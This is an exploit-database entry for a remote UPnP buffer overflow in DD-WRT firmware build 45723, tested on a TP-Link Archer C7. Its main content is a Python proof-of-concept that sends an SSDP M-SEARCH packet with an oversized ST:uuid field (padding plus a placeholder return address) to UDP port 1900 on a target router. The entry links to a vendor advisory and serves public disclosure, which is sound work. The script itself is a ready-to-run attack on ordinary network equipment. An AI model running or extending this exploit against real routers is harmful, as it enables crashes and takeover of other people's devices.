DD-WRT 45723 Buffer Overflow

2021.04.01
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

# Exploit Title: DD-WRT 45723 - UPNP Buffer Overflow (PoC) # Date: 24.03.2021 # Exploit Author: Selim Enes 'Enesdex' Karaduman # Vendor Homepage: https://dd-wrt.com/ # Software Link: https://download1.dd-wrt.com/dd-wrtv2/downloads/betas/2021/ # Version: 45723 or prior # Tested on: TP-Link Archer C7 # https://ssd-disclosure.com/ssd-advisory-dd-wrt-upnp-buffer-overflow/ import socket target_ip = "192.168.2.1" # IP Address of Target off = "D"*164 ret_addr = "AAAA" payload = off + ret_addr packet = \ 'M-SEARCH * HTTP/1.1\r\n' \ 'HOST:239.255.255.250:1900\r\n' \ 'ST:uuid:'+payload+'\r\n' \ 'MX:2\r\n' \ 'MAN:"ssdp:discover"\r\n' \ '\r\n' s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) s.sendto(packet, (target_ip, 1900) )


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top